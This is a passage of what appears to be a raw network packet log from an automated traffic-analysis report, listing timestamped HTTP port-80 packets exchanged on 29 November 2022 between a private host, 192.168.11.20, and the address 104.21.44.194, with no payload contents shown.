                                                                          Nov 29, 2022 09:20:40.348071098 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348105907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348169088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348233938 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348242998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348243952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348243952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348457098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348469973 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348543882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348607063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348669052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348728895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348752022 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348752975 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348789930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348850965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348908901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348973989 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348974943 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.349159002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.349159002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.350584984 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.350678921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.350744009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.350827932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.350836992 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.350912094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.350939035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.350977898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.351039886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.351100922 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.351162910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.351162910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.351164103 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.351164103 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.351334095 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.351500034 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.351500988 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.351500988 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.352669954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.352757931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.352854013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.352897882 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.352925062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.352988005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353050947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353059053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353059053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353115082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353178024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353178024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353178024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353243113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353307962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353347063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353347063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353347063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353370905 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353456020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353524923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353579998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353784084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353785038 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353785038 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353785038 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.356801033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.356874943 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.356933117 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.356986046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.357038975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.357094049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.357167959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.357224941 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.357224941 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.357367992 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374310970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374311924 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374311924 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374363899 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374417067 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374473095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374486923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374486923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374486923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374488115 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374526978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374581099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374634981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374656916 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374687910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374732018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374824047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374824047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374824047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374824047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374824047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374996901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.378233910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378310919 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378370047 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378424883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378479004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378531933 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378587008 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378642082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378647089 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.378699064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378753901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378807068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378818989 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.378861904 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378915071 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378976107 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378988981 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.378988981 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.378988981 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.378989935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.378989935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379031897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379086971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379142046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379156113 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379157066 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379157066 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379195929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379249096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379301071 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379323959 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379324913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379324913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379354954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379409075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379445076 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379462004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379515886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379569054 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379615068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379617929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379617929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379617929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379618883 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379618883 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379618883 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379668951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379722118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379777908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379784107 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379784107 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379859924 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379919052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379973888 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380008936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380008936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380008936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380028009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380084038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380137920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380177975 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380192041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380233049 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380233049 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380234003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380247116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380301952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380383968 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380439043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380449057 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380492926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380548000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380604029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380620003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380620003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380682945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380742073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380795002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380795002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380814075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380882025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380929947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380960941 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380960941 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380960941 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380961895 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.381206989 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.381206989 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386230946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386323929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386384964 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386440039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386478901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386497974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386554003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386624098 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386631966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386696100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386749029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386802912 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386806965 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386806965 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386806965 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386806965 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386806965 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386857033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386912107 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386936903 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386965990 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387021065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387073040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387125969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387136936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387137890 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387178898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387247086 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387260914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387260914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387260914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387307882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387362003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387415886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387428999 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387485981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387553930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387603045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387603045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387603045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387603045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387609005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387603045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387662888 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387710094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387762070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387769938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387770891 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387814999 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387867928 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387921095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387948036 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387974024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388027906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388079882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388133049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388160944 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388160944 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388160944 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388160944 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388160944 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388200998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388271093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388282061 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388282061 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388282061 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388282061 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388360977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388379097 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388416052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388484955 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388552904 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388601065 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388607025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388601065 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388660908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388715029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388768911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388772964 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388772964 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388772964 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388822079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388875008 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388927937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388942957 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388982058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.404671907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.404685020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.404730082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.404772997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.404808998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.404834032 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.404834032 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.404834032 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.404839039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.404834032 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.404874086 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.404900074 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.404900074 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.404911041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.404947042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.404982090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405015945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405050993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405086040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405100107 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405100107 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405100107 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405121088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405157089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405191898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405236959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405276060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405277014 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405277967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405312061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405348063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405381918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405416965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405435085 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405435085 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405435085 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405435085 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405435085 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405435085 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405458927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405504942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405544996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405580044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405592918 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405592918 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405592918 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405616045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405652046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405687094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405721903 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405756950 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405769110 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405769110 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405769110 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405770063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405786991 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405822039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405859947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405905008 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.405926943 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.405941010 CET8049852104.21.44.194192.168.11.20
